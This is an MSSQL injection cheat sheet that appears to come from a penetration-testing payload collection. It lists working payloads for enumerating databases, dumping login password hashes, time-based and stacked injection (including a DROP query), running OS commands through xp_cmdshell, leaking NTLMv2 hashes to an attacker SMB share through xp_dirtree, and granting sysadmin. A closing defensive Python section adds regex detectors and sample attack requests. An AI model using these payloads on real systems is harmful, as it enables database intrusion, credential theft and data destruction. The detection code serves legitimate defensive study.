MSSQL Injection
Summary
- MSSQL comments
- MSSQL version
- MSSQL database name
- MSSQL List databases
- MSSQL List columns
- MSSQL List tables
- MSSQL Extract user/password
- MSSQL Union Based
- MSSQL Error Based
- MSSQL Blind Based
- MSSQL Time Based
- MSSQL Stacked query
- MSSQL Command execution
- MSSQL UNC path
- MSSQL Make user DBA
MSSQL comments
```sql
-- comment goes here
/* comment goes here */
```
MSSQL version
```sql
SELECT @@version
```
MSSQL database name
```sql
SELECT DB_NAME()
```
MSSQL List databases
```sql
SELECT name FROM master..sysdatabases;
SELECT DB_NAME(N); -- for N = 0, 1, 2, ...
```
MSSQL List columns
```sql
SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = 'mytable'); -- for the current DB only
SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name='sometable'; -- list column names and types for master..sometable
SELECT table_catalog, column_name FROM information_schema.columns
```
MSSQL List tables
```sql
SELECT name FROM master..sysobjects WHERE xtype = 'U'; -- use xtype = 'V' for views
SELECT name FROM someotherdb..sysobjects WHERE xtype = 'U';
SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name='sometable'; -- list column names and types for master..sometable
SELECT table_catalog, table_name FROM information_schema.columns
```
MSSQL Extract user/password
MSSQL 2000:
```sql
SELECT name, password FROM master..sysxlogins
SELECT name, master.dbo.fn_varbintohexstr(password) FROM master..sysxlogins -- need to convert to hex to return hashes in an MSSQL error message / some versions of Query Analyzer
```
MSSQL 2005:
```sql
SELECT name, password_hash FROM master.sys.sql_logins
SELECT name + '-' + master.sys.fn_varbintohexstr(password_hash) FROM master.sys.sql_logins
```
MSSQL Union Based
```sql
-- extract database names
$ SELECT name FROM master..sysdatabases
[*] Injection
[*] msdb
[*] tempdb

-- extract tables from the Injection database
$ SELECT name FROM Injection..sysobjects WHERE xtype = 'U'
[*] Profiles
[*] Roles
[*] Users

-- extract columns for the table Users
$ SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = 'Users')
[*] UserId
[*] UserName

-- finally extract the data
$ SELECT UserId, UserName FROM Users
```
MSSQL Error based
```sql
-- for integer inputs
convert(int,@@version)
cast((SELECT @@version) as int)

-- for string inputs
' + convert(int,@@version) + '
' + cast((SELECT @@version) as int) + '
```
MSSQL Blind based
```sql
SELECT @@version WHERE @@version LIKE '%12.0.2000.8%'

WITH data AS (SELECT (ROW_NUMBER() OVER (ORDER BY message)) as row,* FROM log_table)
SELECT message FROM data WHERE row = 1 and message like 't%'
```
MSSQL Time based
```sql
ProductID=1;waitfor delay '0:0:10'--
ProductID=1);waitfor delay '0:0:10'--
ProductID=1';waitfor delay '0:0:10'--
ProductID=1');waitfor delay '0:0:10'--
ProductID=1));waitfor delay '0:0:10'--

IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]' comment: --
```
MSSQL Stacked Query
Use a semi-colon ";" to add another query:
```sql
ProductID=1; DROP members--
```
MSSQL Command execution
```sql
EXEC xp_cmdshell "net user";
EXEC master.dbo.xp_cmdshell 'cmd.exe dir c:';
EXEC master.dbo.xp_cmdshell 'ping 127.0.0.1';
```
If you need to reactivate xp_cmdshell (disabled by default since SQL Server 2005):
```sql
EXEC sp_configure 'show advanced options',1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell',1;
RECONFIGURE;
```
To interact with the MSSQL instance:
```
sqsh -S 192.168.1.X -U sa -P superPassword
python mssqlclient.py WORKGROUP/Administrator:password@192.168.1X -port 46758
```
MSSQL UNC Path
MSSQL supports stacked queries, so we can create a variable pointing to our IP address, then use the xp_dirtree function to list the files in our SMB share and grab the NTLMv2 hash.
```sql
1'; use master; exec xp_dirtree '\\10.10.15.XX\SHARE';--
```
MSSQL Make user DBA (DB admin)
```sql
EXEC master.dbo.sp_addsrvrolemember 'user', 'sysadmin';
```
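On the defensive side, the payload families listed on this page (time-based `waitfor delay`, error-based `convert`/`cast`, stacked `;`, `xp_cmdshell`/`sp_configure`, `xp_dirtree` UNC paths, `sp_addsrvrolemember`, catalog enumeration) are easy to tag in web-server or proxy logs. The following Python is an added example, not code from this cheat sheet; the regexes, the family names and the request lines (including the placeholder UNC host) are constructed for illustration and are not an exhaustive ruleset.

```python
import re
from urllib.parse import unquote_plus

# One signature per payload family on this page (constructed regexes; illustrative, not exhaustive).
SIGNATURES = {
    "time_based":  r"waitfor\s+delay",
    "error_based": r"\b(convert|cast)\s*\(\s*int\s*,|\bas\s+int\s*\)",
    "cmd_exec":    r"xp_cmdshell|sp_configure",
    "unc_path":    r"xp_dirtree|\\\\[\w.]+\\",
    "priv_esc":    r"sp_addsrvrolemember",
    "enumeration": r"\b(sysdatabases|sysobjects|syscolumns|sysxlogins|sql_logins|information_schema)\b"
                   r"|@@version|\bdb_name\s*\(",
    "stacked":     r";\s*(select|drop|exec|use|waitfor|insert|update|delete)\b",
    "comment":     r"--|/\*",
}
COMPILED = {name: re.compile(pat, re.IGNORECASE) for name, pat in SIGNATURES.items()}

def normalize(value: str) -> str:
    """Decode URL encoding twice (covers double-encoded input) so the regexes see plain text."""
    return unquote_plus(unquote_plus(value))

def classify(value: str) -> list[str]:
    """Return the payload families whose signature matches, in SIGNATURES order."""
    text = normalize(value)
    return [name for name, rx in COMPILED.items() if rx.search(text)]

# Constructed request-log lines (not real traffic); the UNC host is a placeholder.
SAMPLE_REQUESTS = [
    "GET /product?ProductID=1 HTTP/1.1",
    "GET /product?ProductID=1;waitfor%20delay%20'0:0:10'-- HTTP/1.1",
    "GET /product?ProductID=1';%20exec%20master..xp_cmdshell%20'net%20user'-- HTTP/1.1",
    "GET /product?ProductID=1';%20use%20master;%20exec%20xp_dirtree%20'\\\\10.10.15.XX\\SHARE';-- HTTP/1.1",
    "GET /search?q=convert(int,@@version) HTTP/1.1",
]

def scan(lines):
    """Return (line, families) for the lines worth alerting on.

    A bare comment token ('--' or '/*') is too common in legitimate input to alert on by
    itself, so a line is reported only when at least one other family also matched.
    """
    hits = []
    for line in lines:
        families = classify(line)
        if any(f != "comment" for f in families):
            hits.append((line, families))
    return hits

if __name__ == "__main__":
    for line, families in scan(SAMPLE_REQUESTS):
        print(f"{', '.join(families):32} {line}")
```

The "comment" family is kept as supporting evidence only; on its own it would flag ordinary text containing `--`.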
